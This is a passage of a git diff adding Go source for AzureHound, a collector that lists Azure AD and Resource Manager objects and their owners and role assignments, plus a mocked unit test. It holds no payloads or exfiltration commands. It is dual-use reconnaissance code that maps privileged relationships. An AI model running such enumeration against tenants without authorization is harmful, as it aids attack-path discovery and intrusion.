hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAzureADCmd) +} + +var listAzureADCmd = &cobra.Command{ + Use: "az-ad", + Long: "Lists All Azure AD Entities", + PersistentPreRunE: persistentPreRunE, + Run: listAzureADCmdImpl, + SilenceUsage: true, +} + +func listAzureADCmdImpl(cmd *cobra.Command, args []string) { + if len(args) > 0 { + exit(fmt.Errorf("unsupported subcommand: %v", args)) + } + + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure ad objects...") + start := time.Now() + stream := listAllAD(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAllAD(ctx context.Context, client client.AzureClient) <-chan interface{} { + var ( + devices = make(chan interface{}) + devices2 = make(chan interface{}) + + groups = make(chan interface{}) + groups2 = make(chan interface{}) + groups3 = make(chan interface{}) + + roles = make(chan interface{}) + roles2 = make(chan interface{}) + + servicePrincipals = make(chan interface{}) + servicePrincipals2 = make(chan interface{}) + servicePrincipals3 = make(chan interface{}) + + tenants = make(chan interface{}) + ) + + // Enumerate Apps, AppOwners and AppMembers + appChans := pipeline.TeeFixed(ctx.Done(), listApps(ctx, client), 2) + apps := pipeline.ToAny(ctx.Done(), appChans[0]) + appOwners := pipeline.ToAny(ctx.Done(), listAppOwners(ctx, client, appChans[1])) + + // Enumerate Devices and DeviceOwners + pipeline.Tee(ctx.Done(), listDevices(ctx, client), devices, devices2) + deviceOwners := listDeviceOwners(ctx, client, devices2) + + // Enumerate Groups, GroupOwners and GroupMembers + pipeline.Tee(ctx.Done(), listGroups(ctx, client), groups, groups2, groups3) + groupOwners := listGroupOwners(ctx, client, groups2) + groupMembers := listGroupMembers(ctx, client, groups3) + + // Enumerate ServicePrincipals and ServicePrincipalOwners + pipeline.Tee(ctx.Done(), listServicePrincipals(ctx, client), servicePrincipals, servicePrincipals2, servicePrincipals3) + servicePrincipalOwners := listServicePrincipalOwners(ctx, client, servicePrincipals2) + + // Enumerate Tenants + pipeline.Tee(ctx.Done(), listTenants(ctx, client), tenants) + + // Enumerate Users + users := listUsers(ctx, client) + + // Enumerate Roles and RoleAssignments + pipeline.Tee(ctx.Done(), listRoles(ctx, client), roles, roles2) + roleAssignments := listRoleAssignments(ctx, client, roles2) + + // Enumerate AppRoleAssignments + appRoleAssignments := listAppRoleAssignments(ctx, client, servicePrincipals3) + + return pipeline.Mux(ctx.Done(), + appOwners, + appRoleAssignments, + apps, + deviceOwners, + devices, + groupMembers, + groupOwners, + groups, + roleAssignments, + roles, + servicePrincipalOwners, + servicePrincipals, + tenants, + users, + ) +} diff --git a/cmd/list-azure-rm.go b/cmd/list-azure-rm.go new file mode 100644 index 0000000..b377e58 --- /dev/null +++ b/cmd/list-azure-rm.go @@ -0,0 +1,251 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAzureRMCmd) +} + +var listAzureRMCmd = &cobra.Command{ + Use: "az-rm", + Long: "Lists All Azure RM Entities", + PersistentPreRunE: persistentPreRunE, + Run: listAzureRMCmdImpl, + SilenceUsage: true, +} + +func listAzureRMCmdImpl(cmd *cobra.Command, args []string) { + if len(args) > 0 { + exit(fmt.Errorf("unsupported subcommand: %v", args)) + } + + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure resource management objects...") + start := time.Now() + stream := listAllRM(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAllRM(ctx context.Context, client client.AzureClient) <-chan interface{} { + var ( + functionApps = make(chan interface{}) + functionApps2 = make(chan interface{}) + + webApps = make(chan interface{}) + webApps2 = make(chan interface{}) + + automationAccounts = make(chan interface{}) + automationAccounts2 = make(chan interface{}) + + containerRegistries = make(chan interface{}) + containerRegistries2 = make(chan interface{}) + + logicApps = make(chan interface{}) + logicApps2 = make(chan interface{}) + + managedClusters = make(chan interface{}) + managedClusters2 = make(chan interface{}) + + vmScaleSets = make(chan interface{}) + vmScaleSets2 = make(chan interface{}) + + keyVaults = make(chan interface{}) + keyVaults2 = make(chan interface{}) + keyVaults3 = make(chan interface{}) + keyVaultRoleAssignments1 = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + keyVaultRoleAssignments2 = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + keyVaultRoleAssignments3 = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + keyVaultRoleAssignments4 = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + + mgmtGroups = make(chan interface{}) + mgmtGroups2 = make(chan interface{}) + mgmtGroups3 = make(chan interface{}) + mgmtGroupRoleAssignments1 = make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + mgmtGroupRoleAssignments2 = make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + + resourceGroups = make(chan interface{}) + resourceGroups2 = make(chan interface{}) + resourceGroupRoleAssignments1 = make(chan azureWrapper[models.ResourceGroupRoleAssignments]) + resourceGroupRoleAssignments2 = make(chan azureWrapper[models.ResourceGroupRoleAssignments]) + + subscriptions = make(chan interface{}) + subscriptions2 = make(chan interface{}) + subscriptions3 = make(chan interface{}) + subscriptions4 = make(chan interface{}) + subscriptions5 = make(chan interface{}) + subscriptions6 = make(chan interface{}) + subscriptions7 = make(chan interface{}) + subscriptions8 = make(chan interface{}) + subscriptions9 = make(chan interface{}) + subscriptions10 = make(chan interface{}) + subscriptions11 = make(chan interface{}) + subscriptions12 = make(chan interface{}) + subscriptionRoleAssignments1 = make(chan interface{}) + subscriptionRoleAssignments2 = make(chan interface{}) + + virtualMachines = make(chan interface{}) + virtualMachines2 = make(chan interface{}) + virtualMachineRoleAssignments1 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + virtualMachineRoleAssignments2 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + virtualMachineRoleAssignments3 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + virtualMachineRoleAssignments4 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + virtualMachineRoleAssignments5 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + ) + + // Enumerate entities + pipeline.Tee(ctx.Done(), listManagementGroups(ctx, client), mgmtGroups, mgmtGroups2, mgmtGroups3) + pipeline.Tee(ctx.Done(), listSubscriptions(ctx, client), + subscriptions, + subscriptions2, + subscriptions3, + subscriptions4, + subscriptions5, + subscriptions6, + subscriptions7, + subscriptions8, + subscriptions9, + subscriptions10, + subscriptions11, + subscriptions12, + ) + pipeline.Tee(ctx.Done(), listResourceGroups(ctx, client, subscriptions2), resourceGroups, resourceGroups2) + pipeline.Tee(ctx.Done(), listKeyVaults(ctx, client, subscriptions3), keyVaults, keyVaults2, keyVaults3) + pipeline.Tee(ctx.Done(), listVirtualMachines(ctx, client, subscriptions4), virtualMachines, virtualMachines2) + pipeline.Tee(ctx.Done(), listFunctionApps(ctx, client, subscriptions6), functionApps, functionApps2) + pipeline.Tee(ctx.Done(), listWebApps(ctx, client, subscriptions7), webApps, webApps2) + pipeline.Tee(ctx.Done(), listAutomationAccounts(ctx, client, subscriptions8), automationAccounts, automationAccounts2) + pipeline.Tee(ctx.Done(), listContainerRegistries(ctx, client, subscriptions9), containerRegistries, containerRegistries2) + pipeline.Tee(ctx.Done(), listLogicApps(ctx, client, subscriptions10), logicApps, logicApps2) + pipeline.Tee(ctx.Done(), listManagedClusters(ctx, client, subscriptions11), managedClusters, managedClusters2) + pipeline.Tee(ctx.Done(), listVMScaleSets(ctx, client, subscriptions12), vmScaleSets, vmScaleSets2) + + // Enumerate Relationships + // ManagementGroups: Descendants, Owners and UserAccessAdmins + mgmtGroupDescendants := listManagementGroupDescendants(ctx, client, mgmtGroups2) + pipeline.Tee(ctx.Done(), listManagementGroupRoleAssignments(ctx, client, mgmtGroups3), mgmtGroupRoleAssignments1, mgmtGroupRoleAssignments2) + mgmtGroupOwners := listManagementGroupOwners(ctx, mgmtGroupRoleAssignments1) + mgmtGroupUserAccessAdmins := listManagementGroupUserAccessAdmins(ctx, mgmtGroupRoleAssignments2) + + // Subscriptions: Owners and UserAccessAdmins + pipeline.Tee(ctx.Done(), listSubscriptionRoleAssignments(ctx, client, subscriptions5), subscriptionRoleAssignments1, subscriptionRoleAssignments2) + subscriptionOwners := listSubscriptionOwners(ctx, client, subscriptionRoleAssignments1) + subscriptionUserAccessAdmins := listSubscriptionUserAccessAdmins(ctx, client, subscriptionRoleAssignments2) + + // ResourceGroups: Owners and UserAccessAdmins + pipeline.Tee(ctx.Done(), listResourceGroupRoleAssignments(ctx, client, resourceGroups2), resourceGroupRoleAssignments1, resourceGroupRoleAssignments2) + resourceGroupOwners := listResourceGroupOwners(ctx, resourceGroupRoleAssignments1) + resourceGroupUserAccessAdmins := listResourceGroupUserAccessAdmins(ctx, resourceGroupRoleAssignments2) + + // KeyVaults: AccessPolicies, Owners, UserAccessAdmins, Contributors and KVContributors + pipeline.Tee(ctx.Done(), listKeyVaultRoleAssignments(ctx, client, keyVaults2), keyVaultRoleAssignments1, keyVaultRoleAssignments2, keyVaultRoleAssignments3, keyVaultRoleAssignments4) + keyVaultAccessPolicies := listKeyVaultAccessPolicies(ctx, client, keyVaults3, []enums.KeyVaultAccessType{enums.GetCerts, enums.GetKeys, enums.GetCerts}) + keyVaultOwners := listKeyVaultOwners(ctx, keyVaultRoleAssignments1) + keyVaultUserAccessAdmins := listKeyVaultUserAccessAdmins(ctx, keyVaultRoleAssignments2) + keyVaultContributors := listKeyVaultContributors(ctx, keyVaultRoleAssignments3) + keyVaultKVContributors := listKeyVaultKVContributors(ctx, keyVaultRoleAssignments4) + + // VirtualMachines: Owners, AvereContributors, Contributors, AdminLogins and UserAccessAdmins + pipeline.Tee(ctx.Done(), listVirtualMachineRoleAssignments(ctx, client, virtualMachines2), virtualMachineRoleAssignments1, virtualMachineRoleAssignments2, virtualMachineRoleAssignments3, virtualMachineRoleAssignments4, virtualMachineRoleAssignments5) + virtualMachineOwners := listVirtualMachineOwners(ctx, virtualMachineRoleAssignments1) + virtualMachineAvereContributors := listVirtualMachineAvereContributors(ctx, virtualMachineRoleAssignments2) + virtualMachineContributors := listVirtualMachineContributors(ctx, virtualMachineRoleAssignments3) + virtualMachineAdminLogins := listVirtualMachineAdminLogins(ctx, virtualMachineRoleAssignments4) + virtualMachineUserAccessAdmins := listVirtualMachineUserAccessAdmins(ctx, virtualMachineRoleAssignments5) + + // Enumerate Function App Role Assignments + functionAppRoleAssignments := listFunctionAppRoleAssignments(ctx, client, functionApps2) + + // Enumerate Web App Role Assignments + webAppRoleAssignments := listWebAppRoleAssignments(ctx, client, webApps2) + + // Enumerate Automation Account Role Assignments + automationAccountRoleAssignments := listAutomationAccountRoleAssignments(ctx, client, automationAccounts2) + + // Enumerate Container Registry Role Assignments + containerRegistryRoleAssignments := listContainerRegistryRoleAssignments(ctx, client, containerRegistries2) + + // Enumerate Logic Apps Role Assignments + logicAppRoleAssignments := listLogicAppRoleAssignments(ctx, client, logicApps2) + + // Enumerate Managed Cluster Role Assignments + managedClusterRoleAssignments := listManagedClusterRoleAssignments(ctx, client, managedClusters2) + + // Enumerate VM Scale Set Role Assignments + vmScaleSetRoleAssignments := listVMScaleSetRoleAssignments(ctx, client, vmScaleSets2) + + return pipeline.Mux(ctx.Done(), + automationAccounts, + automationAccountRoleAssignments, + containerRegistries, + containerRegistryRoleAssignments, + functionApps, + functionAppRoleAssignments, + keyVaultAccessPolicies, + keyVaultContributors, + keyVaultKVContributors, + keyVaultOwners, + keyVaultUserAccessAdmins, + keyVaults, + logicApps, + logicAppRoleAssignments, + managedClusters, + managedClusterRoleAssignments, + mgmtGroupDescendants, + mgmtGroupOwners, + mgmtGroupUserAccessAdmins, + mgmtGroups, + resourceGroupOwners, + resourceGroupUserAccessAdmins, + resourceGroups, + subscriptionOwners, + subscriptionUserAccessAdmins, + subscriptions, + virtualMachineAdminLogins, + virtualMachineAvereContributors, + virtualMachineContributors, + virtualMachineOwners, + virtualMachineUserAccessAdmins, + virtualMachines, + vmScaleSets, + vmScaleSetRoleAssignments, + webApps, + webAppRoleAssignments, + ) +} diff --git a/cmd/list-container-registries.go b/cmd/list-container-registries.go new file mode 100644 index 0000000..3786159 --- /dev/null +++ b/cmd/list-container-registries.go @@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listContainerRegistriesCmd) +} + +var listContainerRegistriesCmd = &cobra.Command{ + Use: "container-registries", + Long: "Lists Azure Container Registries", + Run: listContainerRegistriesCmdImpl, + SilenceUsage: true, +} + +func listContainerRegistriesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure container registries...") + start := time.Now() + stream := listContainerRegistries(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listContainerRegistries(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating container registries", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureContainerRegistries(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing container registries for this subscription", "subscriptionId", id) + } else { + resourceGroupId := item.Ok.ResourceGroupId() + containerRegistry := models.ContainerRegistry{ + ContainerRegistry: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: resourceGroupId, + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found container registry", "containerRegistry", containerRegistry) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZContainerRegistry, + Data: containerRegistry, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing container registries", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all container registries") + }() + + return out +} diff --git a/cmd/list-container-registry-role-assignments.go b/cmd/list-container-registry-role-assignments.go new file mode 100644 index 0000000..7e8b696 --- /dev/null +++ b/cmd/list-container-registry-role-assignments.go @@ -0,0 +1,141 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listContainerRegistryRoleAssignment) +} + +var listContainerRegistryRoleAssignment = &cobra.Command{ + Use: "container-registry-role-assignments", + Long: "Lists Azure Container Registry Role Assignments", + Run: listContainerRegistryRoleAssignmentImpl, + SilenceUsage: true, +} + +func listContainerRegistryRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure container registry role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listContainerRegistryRoleAssignments(ctx, azClient, listContainerRegistries(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listContainerRegistryRoleAssignments(ctx context.Context, client client.AzureClient, containerRegistries <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), containerRegistries) { + if containerRegistry, ok := result.(AzureWrapper).Data.(models.ContainerRegistry); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating container registry role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, containerRegistry.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + containerRegistryRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this container registry", "containerRegistryId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + containerRegistryRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found container registry role assignment", "containerRegistryRoleAssignment", containerRegistryRoleAssignment) + count++ + containerRegistryRoleAssignments.RoleAssignments = append(containerRegistryRoleAssignments.RoleAssignments, containerRegistryRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZContainerRegistryRoleAssignment, + Data: containerRegistryRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing container registry role assignments", "containerRegistryId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all container registry role assignments") + }() + + return out +} diff --git a/cmd/list-device-owners.go b/cmd/list-device-owners.go new file mode 100644 index 0000000..39e9b9e --- /dev/null +++ b/cmd/list-device-owners.go @@ -0,0 +1,131 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listDeviceOwnersCmd) +} + +var listDeviceOwnersCmd = &cobra.Command{ + Use: "device-owners", + Long: "Lists Azure AD Device Owners", + Run: listDeviceOwnersCmdImpl, + SilenceUsage: true, +} + +func listDeviceOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure device owners...") + start := time.Now() + stream := listDeviceOwners(ctx, azClient, listDevices(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listDeviceOwners(ctx context.Context, client client.AzureClient, devices <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), devices) { + if device, ok := result.(AzureWrapper).Data.(models.Device); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating device owners", "result", result) + } else { + if ok := pipeline.Send(ctx.Done(), ids, device.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + data = models.DeviceOwners{ + DeviceId: id, + } + count = 0 + ) + for item := range client.ListAzureDeviceRegisteredOwners(ctx, id, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing owners for this device", "deviceId", id) + } else { + deviceOwner := models.DeviceOwner{ + Owner: item.Ok, + DeviceId: id, + } + log.V(2).Info("found device owner", "deviceOwner", deviceOwner) + count++ + data.Owners = append(data.Owners, deviceOwner) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZDeviceOwner, + Data: data, + }); !ok { + return + } + log.V(1).Info("finished listing device owners", "deviceId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all device owners") + }() + + return out +} diff --git a/cmd/list-device-owners_test.go b/cmd/list-device-owners_test.go new file mode 100644 index 0000000..87a2306 --- /dev/null +++ b/cmd/list-device-owners_test.go @@ -0,0 +1,102 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListDeviceOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockDevicesChannel := make(chan interface{}) + mockDeviceOwnerChannel := make(chan client.AzureResult[json.RawMessage]) + mockDeviceOwnerChannel2 := make(chan client.AzureResult[json.RawMessage]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureDeviceRegisteredOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockDeviceOwnerChannel).Times(1) + mockClient.EXPECT().ListAzureDeviceRegisteredOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockDeviceOwnerChannel2).Times(1) + channel := listDeviceOwners(ctx, mockClient, mockDevicesChannel) + + go func() { + defer close(mockDevicesChannel) + mockDevicesChannel <- AzureWrapper{ + Data: models.Device{}, + } + mockDevicesChannel <- AzureWrapper{ + Data: models.Device{}, + } + }() + go func() { + defer close(mockDeviceOwnerChannel) + mockDeviceOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockDeviceOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + }() + go func() { + defer close(mockDeviceOwnerChannel2) + mockDeviceOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockDeviceOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.DeviceOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.DeviceOwners{}) + } else if len(data.Owners) != 2 { + t.Errorf("got %v, want %v", len(data.Owners), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.DeviceOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.DeviceOwners{}) + } else if len(data.Owners) != 1 { + t.Errorf("got %v, want %v", len(data.Owners), 2) + } +} diff --git a/cmd/list-devices.go b/cmd/list-devices.go new file mode 100644 index 0000000..184b5bb --- /dev/null +++ b/cmd/list-devices.go @@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listDevicesCmd) +} + +var listDevicesCmd = &cobra.Command{ + Use: "devices", + Long: "Lists Azure Active Directory Devices", + Run: listDevicesCmdImpl, + SilenceUsage: true, +} + +func listDevicesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting 